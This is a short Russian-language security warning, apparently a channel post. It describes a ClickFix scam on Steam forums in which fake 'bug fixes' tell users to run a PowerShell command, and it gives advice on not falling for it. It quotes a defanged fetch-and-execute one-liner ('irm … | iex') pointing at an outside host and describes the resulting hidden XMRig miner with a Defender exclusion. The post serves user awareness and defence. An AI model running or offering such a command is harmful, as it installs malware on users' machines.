❕ Как «проверенный фикс бага» со Steam-форумов превращает ваш компьютер в тихого майнера.
На форумах Steam мошенники отвечают на вопросы про вылеты, баги и пропавший лут и предлагают «быстрое решение»: открыть PowerShell от имени администратора и выполнить команду вида irm msfconfig[.]icu | iex. Звучит безобидно, но это классическая ClickFix‑атака: вас убеждают своими руками запустить вредонос.
Что делает команда: irm (Invoke‑RestMethod) скачивает скрипт с чужого сервера по указанному адресу; iex (Invoke‑Expression) сразу исполняет этот скрипт как код PowerShell.
Скрипт притворяется «оптимизатором Windows»: показывает фейковые уведомления про очистку кэша, обновление драйверов и проверку диска. В фоне он создаёт скрытую папку C:WindowsBackground, добавляет её в исключения Defender и скачивает туда криптомайнер XMRig.
Как не попасться: 🟢не копируйте и не запускайте команды PowerShell/Terminal/cmd из чужих советов на форумах, в чатах и комментариях; 🟢перед запуском любой непонятной команды гуглите, что она делает; 🟢не выключайте антивирус по советам сомнительных инструкций.
И пусть баги обходят вас стороной ✨